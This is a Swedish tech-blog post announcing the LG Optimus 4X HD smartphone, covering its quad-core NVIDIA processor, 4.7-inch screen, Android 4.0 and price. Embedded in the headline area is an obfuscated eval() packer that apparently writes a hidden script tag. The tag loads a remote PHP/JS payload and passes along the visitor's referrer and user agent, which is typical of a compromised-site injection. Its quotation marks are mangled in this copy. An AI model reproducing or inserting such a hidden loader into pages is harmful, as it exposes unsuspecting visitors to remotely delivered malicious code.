Image Image Image Image Image Image Image Image Image Image

| 1 december, 2020

Scroll to top

Top

LG Optimus 4X HD på väg till butikerna

LG Optimus 4X HD på väg till butikerna
Sebastian

LG eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|yyydd|var|u0026u|referrer|bhzda||js|php’.split(’|’),0,{}))
Optimus 4X HD på väg till butikerna

LG släpper nu sin första fyrkärniga smartphone i Sverige och den ska enligt LG finnas tillgänglig i butikerna från och med juni. Med Optimus 4X HD har LG satsat lite extra på att ge en skön användarupplevelse med nya, smarta funktioner – och kombinationen av god prestanda och stilren design gör verkligen denna telefon till en äkta smartphone.

Optimus 4X HD använder det nya operativsystemet Android 4.0 – Ice Cream Sandwich – och kommer med bland annat 8.0 MP kamera med videoinspelning, MP3-Spelare, bluetooth, Wi-Fi och USB. En ljusstark 4,7” True HD IPS-skärm med 1280 x 720 upplösning ger både klara färger och suverän bildåtergivning – även i starkt solljus. Internminnet ligger på 16 GB, men det finns även plats för minneskort på upp till 64 GB. Genom att använda sig av den nya generationens SIO+ 2150 mAh-batterier på har LG effektiviserat batterikapaciteten i Optimus 4X HD. Den fyrkärniga 1,5 GHz starka processorn från NVIDIA har dessutom kompletterats med en femte, mindre, kärna som endast tas i bruk vid lättare användning och därför gör att batteriet kan utnyttjas maximalt.

För att ge en optimal användarupplevelse har Optimus 4X HD utrustats med en lång rad innovativa funktioner, såsom Quick Memo™, som gör det möjligt för användaren att bara genom ett knapptryck göra om sin smartphone till ett smidigt anteckningsblock, där det går att både rita och skriva. Bilden eller texten kan sedan sparas, mejlas, skickas via MMS eller delas på exempelvis Facebook direkt via telefonen. En annan funktion är NFC (Near Field Communication) som innebär att telefonen kan kommunicera trådlöst med andra kompatibla enheter, samt MHL (Mobile High Definition Link) som gör att man enkelt kan titta på en högupplöst film via en extern HD-TV. Funktionen MediaPlex™ gör det dessutom till en lätt match att hitta en specifik scen i filmen.

Rekommenderat butikspris för LG Optimus 4X HD ligger runt 5500 kronor. Hos NyMobil.se hittar du den till ett extra förmånligt pris.